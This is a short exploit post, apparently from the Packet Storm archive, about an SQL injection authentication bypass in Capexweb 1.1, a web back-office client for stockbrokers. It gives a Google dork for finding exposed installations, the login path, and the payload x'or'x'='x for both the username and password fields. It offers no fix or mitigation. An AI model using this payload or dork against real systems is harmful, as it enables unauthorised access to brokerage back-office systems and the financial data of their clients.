Capexweb 1.1 SQL Injection

2011-12-16T00:00:00
ID PACKETSTORM:107939
Type packetstorm
Reporter D1rt3 Dud3
Modified 2011-12-16T00:00:00

Description

                                        
                                            `# Exploit Title: Capexweb Sql Vulnerable  
# Date: 15 Dec 2011  
# Author: D1rt3 Dud3  
# Google Dork: inurl:capexweb  
# Gr33ts: Th3 RDX  
# Version: 1.1  
# Description: Capexweb is Web based Backoffice client used by leading Stock Exchanges like Berkeley Gains, angle broking house etc.  
  
http://localhost:8080/capexweb/capexweb/  
  
  
Log in details:  
Username: x'or'x'='x  
Password: x'or'x'='x  
  
-------------------------------------------------------------------------------"Indian"  
  
`